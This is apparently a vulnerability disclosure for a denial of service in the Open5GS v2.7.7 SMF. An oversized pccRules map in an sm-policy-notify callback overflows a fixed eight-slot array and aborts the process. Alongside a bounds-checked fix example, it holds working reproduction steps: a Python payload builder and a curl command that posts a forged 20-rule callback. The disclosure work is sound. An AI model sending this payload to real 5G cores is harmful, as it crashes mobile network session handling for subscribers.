| Title | Open5gs SMF v2.7.7 Denial of Service |
|---|---|

## Description

### Open5GS Release, Revision, or Tag
v2.7.7
### Summary
SMF crashes when an `sm-policy-notify` callback carries a `SmPolicyDecision`
whose `pccRules` map contains more entries than the fixed
`sess->policy.pcc_rule` array can hold.
`update_authorized_pcc_rule_and_qos()` copies each PCC rule into
`sess->policy.pcc_rule[sess->policy.num_of_pcc_rule]` and increments the count
without any upper-bound check:
```c
ogs_pcc_rule_t *pcc_rule =
    &sess->policy.pcc_rule[sess->policy.num_of_pcc_rule];
...
sess->policy.num_of_pcc_rule++;
```
But the array size is fixed at `OGS_MAX_NUM_OF_PCC_RULE == 8`.
In the live Docker lab, a callback carrying `20` valid PCC rules corrupted the
subsequent slot state badly enough that the handler hit:
```c
ogs_assert(pcc_rule->num_of_flow == 0);
```
while processing later overflowed entries, aborting the SMF process.
This issue is not a duplicate of the existing `oversized-flowInfos` report.
That earlier bug overflows the per-rule `flow[]` array; this one overflows the
top-level per-session `pcc_rule[]` array.
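The bounded form of the copy loop, as an added example that is not Open5GS code: the names `OGS_MAX_NUM_OF_PCC_RULE`, `num_of_pcc_rule` and `pcc_rule[]` follow the report, but the struct layouts, the `pcc_rule_input_t` stand-in for a decoded `pccRules` map entry and the `apply_pcc_rules()` handler are simplified assumptions, not the project's real definitions. It checks the incoming count against the free slots before touching session state, so an oversized decision is rejected as a whole (the caller maps the result to an HTTP error) instead of writing past the end of the array.

```c
/* Added example, not Open5GS code: a bounds-checked variant of the
 * per-session PCC rule copy described in the report. Struct layouts and the
 * handler are simplified assumptions. */
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define OGS_MAX_NUM_OF_PCC_RULE 8   /* fixed array size named in the report */
#define MAX_RULE_ID 32              /* assumed rule-id buffer size */

typedef struct {
    char id[MAX_RULE_ID];
    int precedence;
    int num_of_flow;                /* the field the FATAL assertion checks */
} pcc_rule_t;

typedef struct {
    pcc_rule_t pcc_rule[OGS_MAX_NUM_OF_PCC_RULE];
    int num_of_pcc_rule;
} policy_t;

typedef struct {
    policy_t policy;
} sess_t;

/* Stand-in for one decoded entry of the pccRules map. */
typedef struct {
    const char *id;
    int precedence;
} pcc_rule_input_t;

enum { RESULT_OK = 0, RESULT_TOO_MANY = 1, RESULT_BAD_RULE = 2 };

/* Pre-flight check: does the whole decision fit in the remaining slots? */
static bool decision_fits(const sess_t *sess, size_t incoming)
{
    int used = sess->policy.num_of_pcc_rule;
    if (used < 0 || used > OGS_MAX_NUM_OF_PCC_RULE)
        return false;               /* count already inconsistent */
    return incoming <= (size_t)(OGS_MAX_NUM_OF_PCC_RULE - used);
}

/* Append one rule into a zeroed slot; fails instead of writing past the end. */
static bool pcc_rule_append(sess_t *sess, const pcc_rule_input_t *in)
{
    if (sess->policy.num_of_pcc_rule >= OGS_MAX_NUM_OF_PCC_RULE)
        return false;               /* the check the report says is missing */
    if (in->id == NULL || strlen(in->id) >= MAX_RULE_ID)
        return false;
    pcc_rule_t *pcc_rule = &sess->policy.pcc_rule[sess->policy.num_of_pcc_rule];
    memset(pcc_rule, 0, sizeof(*pcc_rule));   /* num_of_flow == 0 by construction */
    strcpy(pcc_rule->id, in->id);
    pcc_rule->precedence = in->precedence;
    sess->policy.num_of_pcc_rule++;
    return true;
}

/* Handler model: reject an oversized decision before modifying the session. */
int apply_pcc_rules(sess_t *sess, const pcc_rule_input_t *rules, size_t n)
{
    if (!decision_fits(sess, n))
        return RESULT_TOO_MANY;     /* caller answers with a 4xx instead of aborting */
    for (size_t i = 0; i < n; i++) {
        if (!pcc_rule_append(sess, &rules[i]))
            return RESULT_BAD_RULE;
    }
    return RESULT_OK;
}

/* Constructed sample input: a fresh session and a decision carrying n rules
 * named r0..r(n-1), like the report's callback. Returns the handler result and
 * the resulting rule count via count_out. */
static int run_sample(size_t n, int *count_out)
{
    static char ids[32][MAX_RULE_ID];
    pcc_rule_input_t rules[32];
    sess_t sess;
    memset(&sess, 0, sizeof(sess));
    if (n > 32)
        return -1;
    for (size_t i = 0; i < n; i++) {
        snprintf(ids[i], MAX_RULE_ID, "r%zu", i);
        rules[i].id = ids[i];
        rules[i].precedence = (int)i + 1;
    }
    int rc = apply_pcc_rules(&sess, rules, n);
    *count_out = sess.policy.num_of_pcc_rule;
    return rc;
}

int run_decision(size_t n)       { int c; return run_sample(n, &c); }
int run_decision_count(size_t n) { int c; run_sample(n, &c); return c; }

int main(void)
{
    printf("20 rules: rc=%d count=%d\n", run_decision(20), run_decision_count(20));
    printf(" 8 rules: rc=%d count=%d\n", run_decision(8), run_decision_count(8));
    return 0;
}
```

Checking before the loop rather than inside it matters: a per-append failure halfway through would leave the session with a partially applied decision, whereas the pre-flight check keeps the session exactly as it was when the input is rejected.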
### Steps to reproduce
1. Start the Open5GS live Docker lab.
2. Bring up UERANSIM gNB and UE with the provided configs:
```bash
docker run -d --rm --name smf-audit-gnb \
    --network open5gs --network-alias gnb.ueransim.org \
    -v /home/ubuntu/docker-open5gs/configs/internal/ueransim/gnb.yaml:/ueransim/config/gnb.yaml:ro \
    free5gc/ueransim:latest /ueransim/nr-gnb -c /ueransim/config/gnb.yaml
docker run -d --rm --name smf-audit-ue \
    --network open5gs --network-alias ue.ueransim.org \
    --cap-add NET_ADMIN --privileged \
    -v /home/ubuntu/docker-open5gs/configs/internal/ueransim/ue.yaml:/ueransim/config/ue.yaml:ro \
    free5gc/ueransim:latest /ueransim/nr-ue -c /ueransim/config/ue.yaml -r
```
3. Wait until the UE log shows:
```text
PDU Session establishment is successful PSI[1]
```
4. Send the forged callback to the active `smContextRef` (`1` in this run):
```bash
# Build the callback body: 20 PCC rules, each referencing its own QoS decision.
payload=$(python3 - <<'PY'
import json
rules = {}
qos = {}
for i in range(20):
    rid = f"r{i}"
    qid = f"q{i}"
    rules[rid] = {
        "pccRuleId": rid,
        "precedence": i + 1,
        "refQosData": [qid],
        "flowInfos": [{
            "flowDirection": "UPLINK",
            "flowDescription": f"permit out ip from 10.0.{i}.1 1000 to any"
        }]
    }
    qos[qid] = {"qosId": qid, "5qi": 1, "priorityLevel": 1}
body = {"smPolicyDecision": {"pccRules": rules, "qosDecs": qos}}
print(json.dumps(body, separators=(",", ":")))
PY
)
curl --http2-prior-knowledge -m 5 -sS -i \
    -X POST http://10.33.33.10/nsmf-callback/v1/sm-policy-notify/1/update \
    -H 'content-type: application/json' \
    --data "$payload"
```
5. Check SMF state and logs:
```bash
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' smf
docker logs --since 2026-04-10T20:44:36Z smf
```
### Logs
```text
curl: (56) Recv failure: Connection reset by peer
exited 139 2026-04-10T20:44:44.519843635Z
04/10 20:44:44.429: [smf] FATAL: update_authorized_pcc_rule_and_qos: Assertion `pcc_rule->num_of_flow == 0' failed. (../src/smf/npcf-handler.c:183)
```
### Expected behaviour
SMF should reject oversized `pccRules` input with a normal HTTP error response.
### Observed behaviour
The callback resets the connection and the SMF process exits with code `139`.
### eNodeB/gNodeB
UERANSIM gNB v3.2.7
### UE Models and versions
UERANSIM UE v3.2.7

| Field | Value |
|---|---|
| Source | https://github.com/open5gs/open5gs/issues/4445 |
| User | FrankLin (UID 97501) |
| Submission | 20/04/2026 21:05 (1 month ago) |
| Moderation | 10/05/2026 16:40 (20 days later) |
| Status | Accepted |
| VulDB Entry | 362548 [Open5GS up to 2.7.7 SMF /src/smf/npcf-handler.c update_authorized_pcc_rule_and_qos denial of service] |
| Points | 20 |